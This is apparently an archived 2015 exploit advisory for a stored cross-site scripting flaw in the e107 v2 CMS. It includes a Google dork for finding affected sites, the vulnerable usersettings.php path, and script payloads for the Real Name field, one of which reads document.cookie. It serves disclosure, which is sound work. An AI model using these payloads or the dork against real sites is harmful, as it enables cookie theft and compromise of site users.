e107 v2 Bootstrap CMS XSS Vulnerability

2015.11.19

Credit: Guardiran Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

########################################################
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
########################################################
# Google Dork: Proudly powered by e107
# Date: [19/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [http://e107.org/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.
# CMS user details section is vulnerable to XSS. You can run XSS payloads.
# XSS Vulnerability #1:
# Go Update user settings page
# "http://{target-url}/usersettings.php"
# Set Real Name value;
# "><script>alert(String.fromCharCode(88, 83, 83))</script>
# or
# "><script>alert(document.cookie)</script>
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

e107 v2 Bootstrap CMS XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.